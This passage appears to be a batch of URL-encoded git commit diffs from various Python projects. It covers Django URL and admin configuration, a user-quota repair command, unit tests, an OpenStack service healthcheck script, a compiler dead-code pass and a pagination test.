@@ -1979,32 +1979,87 @@ init__(self, div +_or_request):%0A if isinstance(div_or_request, Div ision):%0A @@ -2054,24 +2054,28 @@ n):%0A + need = Submi @@ -2080,32 +2080,118 @@ mitRequestsNeed( +div_or_request.id)%0A else:%0A need = SubmitRequestsNeed(div_or_request. division.id)%0A @@ -2316,32 +2316,87 @@ __(self, div +_or_request):%0A if isinstance(div_or_request, Div ision):%0A need @@ -2375,32 +2375,36 @@ est, Division):%0A + need = R @@ -2413,32 +2413,118 @@ iewRequestsNeed( +div_or_request.id)%0A else:%0A need = ReviewRequestsNeed(div_or_request. division.id)%0A @@ -2653,24 +2653,79 @@ elf, div +_or_request):%0A if isinstance(div_or_request, Div ision):%0A @@ -2708,32 +2708,36 @@ est, Division):%0A + need = P @@ -2754,16 +2754,102 @@ stsNeed( +div_or_request.id)%0A else:%0A need = PayoutRequestsNeed(div_or_request. division
becba80983c5f0f29f981eadcc79d4f496e1d28b
fix issue #2778
theme/management/commands/fix_user_quota_model.py
theme/management/commands/fix_user_quota_model.py
Python
0
@@ -0,0 +1,863 @@ +from django.contrib.auth.models import User%0D%0Afrom django.core.management.base import BaseCommand%0D%0A%0D%0Afrom theme.models import UserQuota%0D%0A%0D%0A%0D%0Aclass Command(BaseCommand):%0D%0A help = %22This commond can be run to fix the corrupt user data where some users do not %22 %5C%0D%0A %22have UserQuota foreign key relation. This management command can be run on a %22 %5C%0D%0A %22as-needed basis.%22%0D%0A%0D%0A def handle(self, *args, **options):%0D%0A users = User.objects.filter(is_active=True).filter(is_superuser=False).all()%0D%0A hs_internal_zone = %22hydroshare%22%0D%0A for u in users:%0D%0A uq = UserQuota.objects.filter(user__username=u.username, zone=hs_internal_zone).first()%0D%0A if not uq:%0D%0A # create default UserQuota object for this user%0D%0A new_uq = UserQuota.objects.create(user=u)%0D%0A new_uq.save()%0D%0A
4f1cda8459cb6bca2e317bb582266fb43e78215c
Add test_manager_mixin module.
linguist/tests/test_manager_mixin.py
linguist/tests/test_manager_mixin.py
Python
0
@@ -0,0 +1,1548 @@ +# -*- coding: utf-8 -*-%0Afrom __future__ import unicode_literals%0A%0Afrom .base import BaseTestCase%0A%0Afrom ..models import Translation%0Afrom ..utils.i18n import get_cache_key%0A%0A%0Aclass ManagerMixinTest(BaseTestCase):%0A %22%22%22%0A Tests the Linguist's manager mixin.%0A %22%22%22%0A%0A def setUp(self):%0A self.create_registry()%0A%0A def test_set_instance_cache(self):%0A from ..mixins import set_instance_cache%0A%0A translations = %5Bself.translation_en, self.translation_fr%5D%0A set_instance_cache(self.instance, translations)%0A%0A self.assertEqual(%0A self.instance.cached_translations_count,%0A Translation.objects.count())%0A%0A def test_get_translation_lookups(self):%0A from ..mixins import get_translation_lookups%0A%0A lookups = get_translation_lookups(self.instance)%0A self.assertEqual(lookups, %7B%0A 'identifier': self.instance.identifier,%0A 'object_id': self.instance.pk,%0A %7D)%0A%0A lookups = get_translation_lookups(self.instance, fields=%5B'title', 'body'%5D)%0A self.assertEqual(lookups, %7B%0A 'identifier': self.instance.identifier,%0A 'object_id': self.instance.pk,%0A 'field_name__in': %5B'title', 'body'%5D,%0A %7D)%0A%0A lookups = get_translation_lookups(self.instance, fields=%5B'title'%5D, languages=%5B'en', 'fr'%5D)%0A self.assertEqual(lookups, %7B%0A 'identifier': self.instance.identifier,%0A 'object_id': self.instance.pk,%0A 'field_name__in': %5B'title'%5D,%0A 'language__in': %5B'en', 'fr'%5D,%0A %7D)%0A
326249502d9884ea5717afff63b8a7caf60f6c2c
check in openstack healthcheck tool
planetstack/tools/openstack-healthcheck.py
planetstack/tools/openstack-healthcheck.py
Python
0
@@ -0,0 +1,1871 @@ +#! /usr/bin/python%0Aimport os%0Aimport sys%0Aimport subprocess%0Aimport time%0A%0Adef get_systemd_status(service):%0A p=subprocess.Popen(%5B%22/bin/systemctl%22, %22is-active%22, service%5D, stdout=subprocess.PIPE, stderr=subprocess.PIPE)%0A (out, err) = p.communicate()%0A out = out.strip()%0A return out%0A%0Alibvirt_enabled = os.system(%22systemctl -q is-enabled libvirtd.service%22)==0%0Anova_compute_enabled = os.system(%22systemctl -q is-enabled openstack-nova-compute.service%22)==0%0Aopenvswitch_agent_enabled = os.system(%22systemctl -q is-enabled quantum-openvswitch-agent.service%22)==0%0A%0Aprint %22enabled:%22%0Aprint %22 libvirtd=%22, libvirt_enabled%0Aprint %22 openstack-nova-compute=%22, nova_compute_enabled%0Aprint %22 quantum-openvswitch-agent=%22, openvswitch_agent_enabled%0A%0Aif (not libvirt_enabled) or (not nova_compute_enabled) or (not openvswitch_agent_enabled):%0A print %22services are not enabled. exiting%22%0A sys.exit(0)%0A%0Alibvirt_status = get_systemd_status(%22libvirtd.service%22)%0Anova_compute_status = get_systemd_status(%22openstack-nova-compute.service%22)%0Aopenvswitch_agent_status = get_systemd_status(%22quantum-openvswitch-agent.service%22)%0A%0Aprint %22status:%22%0Aprint %22 libvirtd=%22, libvirt_status%0Aprint %22 openstack-nova-compute=%22, nova_compute_status%0Aprint %22 quantum-openvswitch-agent=%22, openvswitch_agent_status%0A%0Aif (libvirt_status==%22failed%22) or (nova_compute_status==%22failed%22) or (openvswitch_agent_status==%22failed%22):%0A print %22services have failed. doing the big restart%22%0A os.system(%22systemctl stop openstack-nova-compute.service%22)%0A os.system(%22systemctl stop quantum-openvswitch-agent.service%22)%0A os.system(%22systemctl stop libvirtd.service%22)%0A time.sleep(5)%0A os.system(%22systemctl start libvirtd.service%22)%0A time.sleep(5)%0A os.system(%22systemctl start quantum-openvswitch-agent.service%22)%0A time.sleep(5)%0A os.system(%22systemctl start openstack-nova-compute.service%22)%0A print %22done%22%0A%0A%0A%0A%0A
0e5e3deb8a8250429ee7a1603e017343f6c7e3bb
Create a Testing Suite
tests/run_tests.py
tests/run_tests.py
Python
0
@@ -0,0 +1,223 @@ +from unittest import defaultTestLoader, TextTestRunner%0Aimport sys%0A%0Asuite = defaultTestLoader.discover(start_dir=%22.%22)%0Aresult = TextTestRunner(verbosity=2, buffer=True).run(suite)%0Asys.exit(0 if result.wasSuccessful() else 1)%0A
ecac8bc83491c9cb2312cf2a1c477c53c4832b4d
Add minimal dead code elimination
pykit/transform/dce.py
pykit/transform/dce.py
Python
0.000589
@@ -0,0 +1,750 @@ +# -*- coding: utf-8 -*-%0A%0A%22%22%22%0ADead code elimination.%0A%22%22%22%0A%0Afrom pykit.analysis import loop_detection%0A%0Aeffect_free = set(%5B%0A 'alloca', 'load', 'new_list', 'new_tuple', 'new_dict', 'new_set',%0A 'new_struct', 'new_data', 'new_exc', 'phi', 'exc_setup', 'exc_catch',%0A 'ptrload', 'ptrcast', 'ptr_isnull', 'getfield', 'getindex',%0A 'add', 'sub', 'mul', 'div', 'mod', 'lshift', 'rshift', 'bitand', 'bitor',%0A 'bitxor', 'invert', 'not_', 'uadd', 'usub', 'eq', 'noteq', 'lt', 'lte',%0A 'gt', 'gte', 'is_', 'addressof',%0A%5D)%0A%0Adef dce(func, env=None):%0A %22%22%22%0A Eliminate dead code.%0A%0A TODO: Prune branches, dead loops%0A %22%22%22%0A for op in func.ops:%0A if op.opcode in effect_free and len(func.uses%5Bop%5D) == 0:%0A op.delete()%0A%0Arun = dce
2fa7855de542bb5ecd303e26d1e9913687478589
Set up test suite to ensure server admin routes are added.
server/tests/test_admin.py
server/tests/test_admin.py
Python
0
@@ -0,0 +1,2368 @@ +%22%22%22General functional tests for the API endpoints.%22%22%22%0A%0A%0Afrom django.test import TestCase, Client%0A# from django.urls import reverse%0A%0Afrom rest_framework import status%0A%0Afrom server.models import ApiKey, User%0A# from api.v2.tests.tools import SalAPITestCase%0A%0A%0Aclass AdminTest(TestCase):%0A %22%22%22Test the admin site is configured to have all expected views.%22%22%22%0A admin_endpoints = %7B%0A 'apikey', 'businessunit', 'condition', 'fact', 'historicalfact',%0A 'installedupdate', 'machinedetailplugin', 'machinegroup', 'machine',%0A 'pendingappleupdate', 'pendingupdate', 'pluginscriptrow',%0A 'pluginscriptsubmission', 'plugin', 'report', 'salsetting', 'updatehistoryitem',%0A 'updatehistory', 'userprofile'%7D%0A%0A def setUp(self):%0A self.client = Client()%0A self.user = User.objects.create(username='test')%0A%0A def test_no_access(self):%0A %22%22%22Test that unauthenticated requests redirected to login.%22%22%22%0A for path in self.admin_endpoints:%0A response = self.client.get('/admin/server/%7B%7D'.format(path))%0A # Redirect to login page.%0A self.assertEqual(response.status_code, status.HTTP_301_MOVED_PERMANENTLY)%0A%0A def test_ro_access(self):%0A %22%22%22Test that ro requests are rejected.%0A%0A RO users should not have access to the admin site (unless they have%0A %60is_staff = True%60.%0A %22%22%22%0A self.user.user_profile = 'RO'%0A self.user.save()%0A self.client.force_login(self.user)%0A%0A for path in self.admin_endpoints:%0A url = '/admin/server/%7B%7D/'.format(path)%0A response = self.client.get(url)%0A msg = 'Failed for path: %22%7B%7D%22'.format(path)%0A self.assertEqual(response.status_code, status.HTTP_302_FOUND, msg=msg)%0A self.assertEqual(response.url, '/admin/login/?next=/admin/server/%7B%7D/'.format(path),%0A msg=msg)%0A%0A def test_ga_access(self):%0A %22%22%22Ensure GA userprofile grants admin page access.%22%22%22%0A self.user.user_profile = 'GA'%0A self.user.save()%0A self.client.force_login(self.user)%0A%0A for path in self.admin_endpoints:%0A url = '/admin/server/%7B%7D/'.format(path)%0A response = self.client.get(url, follow=True)%0A msg = 'Failed for path: %22%7B%7D%22'.format(path)%0A self.assertEqual(response.status_code, status.HTTP_200_OK, msg=msg)%0A
38b12d0581e82ebb0e4fee8500bbd5d83d373afa
Create wikipedia-link-analysis-reducer.py
wikipedia-link-analysis-reducer.py
wikipedia-link-analysis-reducer.py
Python
0.000008
@@ -0,0 +1 @@ +%0A
38f5c8534e3807d0485165017972adf47bd4aa2f
Create utils.py
utilities/utils.py
utilities/utils.py
Python
0.000001
@@ -0,0 +1,555 @@ +from zope.interface import implements%0A%0Afrom IOperation import IOperation%0A%0A%0Aclass Plus(object):%0A implements(IOperation)%0A%0A def __call__(self, a, b):%0A return a + b%0A%0A%0Aclass Minus(object):%0A implements(IOperation)%0A%0A def __call__(self, a, b):%0A return a - b%0A%0A%0A### alternative way to make utility component (using not class-adviser on class level -%3E using function classImplements)%0A# from zope.interface import classImplements%0A# classImplements(Host, IHost)%0A### also in Python 2.6 and later you can use class decorator @implementer(IFoo)%0A
7801f5a34fed9c50ebd0d426a69f875026da9602
Create tutorial2.py
tutorial2.py
tutorial2.py
Python
0
@@ -0,0 +1 @@ +%0A
0ddac190019753d77b1ed78dcd49ad7370d666df
add some utils
python/irispy/utils.py
python/irispy/utils.py
Python
0.000001
@@ -0,0 +1,647 @@ +import numpy as np%0Aimport irispy%0A%0Adef lcon_to_vert(A, b):%0A poly = irispy.Polyhedron(A.shape%5B1%5D)%0A poly.setA(A)%0A poly.setB(b)%0A V = np.vstack(poly.generatorPoints()).T%0A%0Adef sample_convex_polytope(A, b, nsamples):%0A poly = irispy.Polyhedron(A.shape%5B1%5D)%0A poly.setA(A)%0A poly.setB(b)%0A generators = np.vstack(poly.generatorPoints())%0A lb = np.min(generators, axis=0)%0A ub = np.max(generators, axis=0)%0A%0A n = 0%0A samples = np.zeros((len(lb), nsamples))%0A while n %3C nsamples:%0A z = np.random.uniform(lb, ub)%0A if np.all(poly.A.dot(z) %3C= poly.b):%0A samples%5B:,n%5D = z%0A n += 1%0A return samples
538cd00a3c0307818cf62c61be3d91007a9b4091
Add migration for movie.durations_in_s
migrations/versions/349d38252295_.py
migrations/versions/349d38252295_.py
Python
0.000033
@@ -0,0 +1,627 @@ +%22%22%22Add movie.duration_in_s%0A%0ARevision ID: 349d38252295%0ARevises: 2b7f5e38dd73%0ACreate Date: 2014-01-09 15:31:24.597000%0A%0A%22%22%22%0A%0A# revision identifiers, used by Alembic.%0Arevision = '349d38252295'%0Adown_revision = '2b7f5e38dd73'%0A%0Afrom alembic import op%0Aimport sqlalchemy as sa%0A%0A%0Adef upgrade():%0A ### commands auto generated by Alembic - please adjust! ###%0A op.add_column('movie', sa.Column('duration_in_s', sa.Integer(), nullable=True))%0A ### end Alembic commands ###%0A%0A%0Adef downgrade():%0A ### commands auto generated by Alembic - please adjust! ###%0A op.drop_column('movie', 'duration_in_s')%0A ### end Alembic commands ###%0A
c8ad60f23bc630ba8e57f735c8aa0ec7eeaa3c1f
teste ggj18
arquivo3.py
arquivo3.py
Python
0.000001
@@ -0,0 +1,68 @@ +dasdsa%0Asdas%0Asdasd%0Aasdasdas%0A%0As%0Adasdas%0Adas%0Ad%0Aasd%0Aas%0Adas%0Adas%0Adas%0Ad%0Asad%0A
c5bbbe4f6430ef20da55ea0f8039091d4f79c491
Add script to update taking for all team owners
sql/branch.py
sql/branch.py
Python
0
@@ -0,0 +1,324 @@ +import sys%0A%0Afrom gratipay import wireup%0Afrom gratipay.models.participant import Participant%0A%0Adb = wireup.db(wireup.env())%0A%0Ateams = db.all(%22%22%22%0A SELECT t.*::teams%0A FROM teams t%0A%22%22%22)%0A%0Afor team in teams:%0A print(%22Updating team %25s%22 %25 team.slug)%0A Participant.from_username(team.owner).update_taking()%0A%0Aprint(%22Done!%22)%0A
74c58436c28fbca804cd70a88ca1250ca22aa8e6
add test_poll.py
tests/unit/concurrently/condor/test_poll.py
tests/unit/concurrently/condor/test_poll.py
Python
0.00002
@@ -0,0 +1,2021 @@ +# Tai Sakuma %[email protected]%3E%0Aimport os%0Aimport sys%0Aimport logging%0Aimport textwrap%0Aimport collections%0A%0Aimport pytest%0A%0Atry:%0A import unittest.mock as mock%0Aexcept ImportError:%0A import mock%0A%0Afrom alphatwirl.concurrently import WorkingArea%0Afrom alphatwirl.concurrently import HTCondorJobSubmitter%0A%0A##__________________________________________________________________%7C%7C%[email protected]()%0Adef mock_proc_condor_q():%0A ret = mock.Mock()%0A ret.returncode = 0%0A return ret%0A%[email protected]()%0Adef mock_pipe(monkeypatch):%0A ret = mock.Mock()%0A module = sys.modules%5B'alphatwirl.concurrently.exec_util'%5D%0A monkeypatch.setattr(module.subprocess, 'PIPE', ret)%0A%0A return ret%0A%[email protected]()%0Adef mock_popen(monkeypatch, mock_proc_condor_q):%0A ret = mock.Mock()%0A ret.side_effect = %5Bmock_proc_condor_q%5D%0A module = sys.modules%5B'alphatwirl.concurrently.exec_util'%5D%0A monkeypatch.setattr(module.subprocess, 'Popen', ret)%0A return ret%0A%[email protected]()%0Adef obj(mock_popen):%0A return HTCondorJobSubmitter()%0A%0A##__________________________________________________________________%7C%7C%0Adef test_poll(%0A obj, mock_popen, mock_pipe,%0A mock_proc_condor_q, caplog):%0A%0A obj.clusterprocids_outstanding = %5B'3764857.0', '3764858.0', '3764858.1', '3764858.2'%5D%0A%0A stdout = '%5Cn'.join(%5B'3764857.0 2', '3764858.1 2', '3764858.2 1'%5D)%0A mock_proc_condor_q.communicate.return_value = (stdout, '')%0A%0A with caplog.at_level(logging.DEBUG):%0A ret = obj.poll()%0A%0A # assert 6 == len(caplog.records)%0A%0A #%0A assert %5B'3764857.0', '3764858.1', '3764858.2'%5D == obj.clusterprocids_outstanding%0A%0A #%0A expected = %5B'3764858.0'%5D%0A assert expected == ret%0A%0A #%0A expected = %5B%0A %5B'condor_q', '3764857', '3764858', '-format', '%25d.', 'ClusterId', '-format', '%25d ', 'ProcId', '-format', '%25-2s%5Cn', 'JobStatus'%5D%0A %5D%0A procargs_list = %5Bargs%5B0%5D for args, kwargs in mock_popen.call_args_list%5D%0A assert expected == procargs_list%0A%0A##__________________________________________________________________%7C%7C%0A
9967ade200639b584e379ec25030d1598071ffd3
Create TextEditor.py
redactor/TextEditor.py
redactor/TextEditor.py
Python
0.000001
@@ -0,0 +1,592 @@ +from tkinter import *%0A%0A%0Aclass TextEditor():%0A def __init__(self):%0A self.root = Tk()%0A self.root.wm_title(%22BrickText%22)%0A self.text_panel = Text(self.root)%0A self.text_panel.pack(side=RIGHT, fill=BOTH, expand=YES)%0A self.set_tabs()%0A%0A def start(self):%0A self.root.mainloop()%0A%0A def get_root(self):%0A return self.root%0A%0A def get_text_panel(self):%0A return self.text_panel%0A%0A def set_tabs(self):%0A f = font.Font(font=self.text_panel%5B'font'%5D)%0A tab_width = f.measure(' ' * 3)%0A self.text_panel.config(tabs=(tab_width,))%0A
c037412566b0a0313216e49168a8ebcc831e0f9b
add hamshahri information extractor
hamshahri.py
hamshahri.py
Python
0.000008
@@ -0,0 +1,837 @@ +%0Afrom hazm import sent_tokenize, word_tokenize, Normalizer, HamshahriReader, POSTagger, DependencyParser%0Afrom InformationExtractor import InformationExtractor%0A%0A%0Ahamshahri = HamshahriReader('/home/alireza/Corpora/Hamshahri')%0Anormalizer = Normalizer()%0Atagger = POSTagger()%0Aparser = DependencyParser(tagger=tagger)%0Aextractor = InformationExtractor()%0A%0Aoutput = open('informations.txt', 'w')%0Afor text in hamshahri.texts():%0A%09text = normalizer.normalize(text)%0A%09sentences = %5Bword_tokenize(sentence) for sentence in sent_tokenize(text)%5D%0A%09tagged = tagger.batch_tag(sentences)%0A%09parsed = parser.tagged_batch_parse(tagged)%0A%0A%09for sentence in parsed:%0A%09%09print('%5Cn', '*', *%5Bnode%5B'word'%5D for node in sentence.nodelist if node%5B'word'%5D%5D, file=output)%0A%09%09for information in extractor.extract(sentence):%0A%09%09%09print(*information, sep=' - ', file=output)%0A%0A%09break%0A%0A
a7ece57eec28c771bcf2a23dc9c9e575223b1383
add memory usage profiler script
proto/memory_test/calculate_rebot_model.py
proto/memory_test/calculate_rebot_model.py
Python
0.000001
@@ -0,0 +1,1561 @@ +# Copyright 2008-2011 Nokia Siemens Networks Oyj%0A#%0A# Licensed under the Apache License, Version 2.0 (the %22License%22);%0A# you may not use this file except in compliance with the License.%0A# You may obtain a copy of the License at%0A#%0A# http://www.apache.org/licenses/LICENSE-2.0%0A#%0A# Unless required by applicable law or agreed to in writing, software%0A# distributed under the License is distributed on an %22AS IS%22 BASIS,%0A# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.%0A# See the License for the specific language governing permissions and%0A# limitations under the License.%0A%0Aimport sys, os%0Asys.path.insert(0, os.path.join(os.path.dirname(__file__), '..', '..', 'src'))%0Afrom robot.result.builders import ResultFromXML%0Atry:%0A import psutil%0A import objgraph%0Aexcept ImportError:%0A print %22%22%22%0A Please install psutil and objgraph - this script does not work without them.%0A %22%22%22%0A raise%0A%0Adef calculate_rebot_model(output_path):%0A xml = ResultFromXML(output_path)%0A p = psutil.Process(os.getpid())%0A print 'Process memory usage after xml parsing %25f M' %25 (float(p.get_memory_info().rss) / (1024**2))%0A print 'Most common types'%0A objgraph.show_most_common_types()%0A return xml%0A%0Aif __name__ == '__main__':%0A if len(sys.argv) %3C 2:%0A print %22%22%22%0A Simple memory profiler for robot output xml parsing.%0A Calculates memory usages after result model has been created.%0A usage:%0A calculate_rebot_model.py %5BPATH_TO_OUTPUT_XML%5D%0A %22%22%22%0A else:%0A calculate_rebot_model(sys.argv%5B1%5D)%0A
2e985972aa4aad94bfda25ba852326b39498e4fa
Create Unique_Binary_Search_Trees.py
Array/Unique_Binary_Search_Trees.py
Array/Unique_Binary_Search_Trees.py
Python
0.000001
@@ -0,0 +1,1382 @@ +Given n, how many structurally unique BST's (binary search trees) that store values 1...n?%0A%0AFor example,%0AGiven n = 3, there are a total of 5 unique BST's.%0A%0A 1 3 3 2 1%0A %5C / / / %5C %5C%0A 3 2 1 1 3 2%0A / / %5C %5C%0A 2 1 2 3%0A %0A%0Aclass Solution:%0A # @return an integer%0A # Recursion (172ms)%0A def numTrees_1(self, n):%0A if n %3C= 1: return 1%0A result = 0%0A for i in xrange(1,n+1):%0A result += self.numTrees(i-1)*self.numTrees(n-i)%0A return result %0A %0A # DP (46ms) %0A def numTrees(self, n):%0A result = %5B0 for i in xrange(n+1)%5D%0A result%5B0%5D = 1; result%5B1%5D = 1%0A %0A for i in xrange(2, n+1):%0A for j in xrange(1, n+1):%0A result%5Bi%5D += result%5Bj-1%5D*result%5Bi-j%5D%0A return result%5Bn%5D%0A%0A# status: result%5Bi%5D: the number of unique BST for a sequence of length i.%0A# initialize: result%5B0%5D= 1; result%5B1%5D = 1, only one combination to construct a BST out of a sequence %0A# function: %0Aresult%5Bn%5D = F(1,n) + F%5B2,n%5D +...F%5Bn,n%5D %0AF%5Bi, n%5D: the number of unique BST, where the number i is the root of BST, and the sequence ranges from 1 to n.%0AF%5Bi, n%5D = result%5Bi-1%5D * result%5Bn-i%5D 1%3C= i %3C= n%0Aresult%5Bn%5D = result%5B0%5D*result%5Bn-1%5D + result%5B1%5D*result%5Bn-2%5D+..+result%5Bn-1%5D*result%5B0%5D%0A# result: result%5Bn%5D%0A
e2ba20d629fb35225140008437ddd93bcf516ba7
Add translation for action short descriptions
django_mailbox/admin.py
django_mailbox/admin.py
#!/usr/bin/env python # -*- coding: utf-8 -*- """ Model configuration in application ``django_mailbox`` for administration console. """ import logging from django.conf import settings from django.contrib import admin from django_mailbox.models import MessageAttachment, Message, Mailbox from django_mailbox.signals import message_received from django_mailbox.utils import convert_header_to_unicode logger = logging.getLogger(__name__) def get_new_mail(mailbox_admin, request, queryset): for mailbox in queryset.all(): logger.debug('Receiving mail for %s' % mailbox) mailbox.get_new_mail() get_new_mail.short_description = 'Get new mail' def resend_message_received_signal(message_admin, request, queryset): for message in queryset.all(): logger.debug('Resending \'message_received\' signal for %s' % message) message_received.send(sender=message_admin, message=message) resend_message_received_signal.short_description = ( 'Re-send message received signal' ) class MailboxAdmin(admin.ModelAdmin): list_display = ( 'name', 'uri', 'from_email', 'active', 'last_polling', ) readonly_fields = ['last_polling', ] actions = [get_new_mail] class MessageAttachmentAdmin(admin.ModelAdmin): raw_id_fields = ('message', ) list_display = ('message', 'document',) class MessageAttachmentInline(admin.TabularInline): model = MessageAttachment extra = 0 class MessageAdmin(admin.ModelAdmin): def attachment_count(self, msg): return msg.attachments.count() def subject(self, msg): return convert_header_to_unicode(msg.subject) def envelope_headers(self, msg): email = msg.get_email_object() return '\n'.join( [('%s: %s' % (h, v)) for h, v in email.items()] ) inlines = [ MessageAttachmentInline, ] list_display = ( 'subject', 'processed', 'read', 'mailbox', 'outgoing', 'attachment_count', ) ordering = ['-processed'] list_filter = ( 'mailbox', 'outgoing', 'processed', 'read', ) exclude = ( 'body', ) raw_id_fields = ( 'in_reply_to', ) readonly_fields = ( 'envelope_headers', 'text', 'html', ) actions = [resend_message_received_signal] if getattr(settings, 'DJANGO_MAILBOX_ADMIN_ENABLED', True): admin.site.register(Message, MessageAdmin) admin.site.register(MessageAttachment, MessageAttachmentAdmin) admin.site.register(Mailbox, MailboxAdmin)
Python
0.000001
@@ -212,16 +212,72 @@ rt admin +%0Afrom django.utils.translation import ugettext_lazy as _ %0A%0Afrom d @@ -701,16 +701,18 @@ ption = +_( 'Get new @@ -717,16 +717,17 @@ ew mail' +) %0A%0A%0Adef r @@ -1033,16 +1033,18 @@ = (%0A +_( 'Re-send @@ -1068,16 +1068,17 @@ signal' +) %0A)%0A%0A%0Acla @@ -1599,32 +1599,32 @@ unt(self, msg):%0A - return m @@ -1647,16 +1647,80 @@ ount()%0A%0A + attachment_count.short_description = _('Attachment count')%0A%0A def
f23c77d517dd88c38d5ad8fa0601bc61ccf17aa6
Change url from 2016 to 2017
pyconcz_2017/urls.py
pyconcz_2017/urls.py
from django.conf import settings from django.conf.urls import include, url from django.conf.urls.static import static from django.contrib import admin from django.views.generic import TemplateView, RedirectView from pyconcz_2017.common.views import homepage prefixed_urlpatterns = [ url(r'^$', homepage, name='homepage'), url(r'^announcements/', include('pyconcz_2017.announcements.urls')), url(r'^proposals/workshops/$', RedirectView.as_view(url='/2016/proposals/talks')), url(r'^proposals/', include('pyconcz_2017.proposals.urls')), url(r'^about/team/', include('pyconcz_2017.team.urls')), url(r'^speakers/', include('pyconcz_2017.speakers.urls')), url(r'^sponsors/', include('pyconcz_2017.sponsors.urls')), # static pages url(r'^about/$', TemplateView.as_view(template_name='pages/about.html'), name='about'), url(r'^about/code/$', TemplateView.as_view(template_name='pages/code.html'), name='about_code'), url(r'^about/transparency_report/$', TemplateView.as_view(template_name='pages/transparency.html'), name='about_transparency'), url(r'^about/brno/$', TemplateView.as_view(template_name='pages/brno.html'), name='about_brno'), ] urlpatterns = ( static(settings.STATIC_URL, document_root=settings.STATIC_ROOT) + static(settings.MEDIA_URL, document_root=settings.MEDIA_ROOT) + [ url(r'^2016/', include(prefixed_urlpatterns)), url(r'^admin/', include(admin.site.urls)), url(r'^$', RedirectView.as_view(url='/2016/')), ] ) if settings.DEBUG: import debug_toolbar urlpatterns += [ url(r'^__debug__/', include(debug_toolbar.urls)), ]
Python
0.999212
@@ -459,17 +459,17 @@ rl='/201 -6 +7 /proposa @@ -1425,17 +1425,17 @@ l(r'%5E201 -6 +7 /', incl @@ -1566,9 +1566,9 @@ /201 -6 +7 /'))
5becb57514c4b08fc7af2a9a4e38b2c8aac2f576
Create computestats.py
effective_quadratures/computestats.py
effective_quadratures/computestats.py
Python
0.000017
@@ -0,0 +1,3475 @@ +#!/usr/bin/env python%0Aimport numpy as np%0Afrom utils import error_function%0A%0Aclass Statistics(object):%0A %0A %22%22%22%0A This subclass is an domains.ActiveVariableMap specifically for optimization.%0A **See Also**%0A optimizers.BoundedMinVariableMap%0A optimizers.UnboundedMinVariableMap%0A **Notes**%0A This class's train function fits a global quadratic surrogate model to the%0A n+2 active variables---two more than the dimension of the active subspace.%0A This quadratic surrogate is used to map points in the space of active%0A variables back to the simulation parameter space for minimization.%0A %22%22%22%0A%0A # constructor%0A def __init__(self, coefficients, index_set):%0A self.coefficients = coefficients%0A self.index_set = index_set%0A%0A def getMean(self):%0A %22%22%22%0A Train the global quadratic for the regularization.%0A :param ndarray Y: N-by-n matrix of points in the space of active%0A variables.%0A :param int N: merely there satisfy the interface of %60regularize_z%60. It%0A should not be anything other than 1.%0A :return: Z, N-by-(m-n)-by-1 matrix that contains a value of the inactive%0A variables for each value of the inactive variables.%0A :rtype: ndarray%0A **Notes**%0A In contrast to the %60regularize_z%60 in BoundedActiveVariableMap and%0A UnboundedActiveVariableMap, this implementation of %60regularize_z%60 uses%0A a quadratic program to find a single value of the inactive variables%0A for each value of the active variables.%0A %22%22%22 %0A coefficients = self.coefficients%0A mean = coefficients%5B0,0%5D%0A return mean%0A %0A def getVariance(self):%0A coefficients = self.coefficients%0A m, n = coefficients.shape%0A if m %3E n:%0A coefficients = coefficients.T%0A variance = np.sum(coefficients%5B0%5D%5B1:m%5D**2)%0A return variance%0A%0A # Function that computes first order Sobol' indices%0A def getFirstOrderSobol(self):%0A%0A coefficients = self.coefficients%0A m, n = coefficients.shape%0A if m %3E n:%0A coefficients = coefficients.T%0A%0A index_set = self.index_set%0A%0A # Allocate memory!%0A index_set = index_set.getIndexSet()%0A index_set = np.mat(index_set)%0A m, dimensions = index_set.shape%0A variance = self.getVariance()%0A%0A if dimensions == 1:%0A utils.error_function('ERROR: Sobol indices can only be computed for parameter studies with more than one parameter')%0A else:%0A index_set_entries = m%0A local_variance = np.zeros((index_set_entries, dimensions))%0A first_order_sobol_indices = np.zeros((dimensions))%0A%0A # Loop for computing marginal variances!%0A for j in range(0, dimensions):%0A for i in range(0, index_set_entries): # no. of rows%0A # If the index_set%5B0,j%5D is not zero but the remaining are...%0A remaining_indices = np.arange(0, dimensions)%0A remaining_indices = np.delete(remaining_indices, j)%0A if(index_set%5Bi,j%5D != 0 and np.sum(index_set%5Bi, remaining_indices%5D ) == 0):%0A local_variance%5Bi, j%5D = coefficients%5B0%5D%5Bi%5D%0A%0A # Now take the sum of the squares of all the columns%0A for j in range(0, dimensions):%0A first_order_sobol_indices%5Bj%5D = (np.sum(local_variance%5B:,j%5D**2))/(variance)%0A%0A return first_order_sobol_indices%0A
36d0fc3c54dc0c91196c16875c1b1e2d9b0d38ea
Add basic unit test for LimitOffsetPagination
example/tests/unit/test_pagination.py
example/tests/unit/test_pagination.py
Python
0
@@ -0,0 +1,2647 @@ +from collections import OrderedDict%0A%0Afrom rest_framework.request import Request%0Afrom rest_framework.test import APIRequestFactory%0Afrom rest_framework.utils.urls import replace_query_param%0A%0Afrom rest_framework_json_api.pagination import LimitOffsetPagination%0A%0A%0Afactory = APIRequestFactory()%0A%0A%0Aclass TestLimitOffset:%0A %22%22%22%0A Unit tests for %60pagination.LimitOffsetPagination%60.%0A %22%22%22%0A%0A def setup(self):%0A class ExamplePagination(LimitOffsetPagination):%0A default_limit = 10%0A max_limit = 15%0A%0A self.pagination = ExamplePagination()%0A self.queryset = range(1, 101)%0A self.base_url = 'http://testserver/'%0A%0A def paginate_queryset(self, request):%0A return list(self.pagination.paginate_queryset(self.queryset, request))%0A%0A def get_paginated_content(self, queryset):%0A response = self.pagination.get_paginated_response(queryset)%0A return response.data%0A%0A def get_test_request(self, arguments):%0A return Request(factory.get('/', arguments))%0A%0A def test_valid_offset_limit(self):%0A %22%22%22%0A Basic test, assumes offset and limit are given.%0A %22%22%22%0A offset = 10%0A limit = 5%0A count = len(self.queryset)%0A last_offset = count - limit%0A next_offset = 15%0A prev_offset = 5%0A%0A request = self.get_test_request(%7B%0A self.pagination.limit_query_param: limit,%0A self.pagination.offset_query_param: offset%0A %7D)%0A base_url = replace_query_param(self.base_url, self.pagination.limit_query_param, limit)%0A last_url = replace_query_param(base_url, self.pagination.offset_query_param, last_offset)%0A first_url = base_url%0A next_url = replace_query_param(base_url, self.pagination.offset_query_param, next_offset)%0A prev_url = replace_query_param(base_url, self.pagination.offset_query_param, prev_offset)%0A queryset = self.paginate_queryset(request)%0A content = self.get_paginated_content(queryset)%0A next_offset = offset + limit%0A%0A expected_content = %7B%0A 'results': list(range(offset + 1, 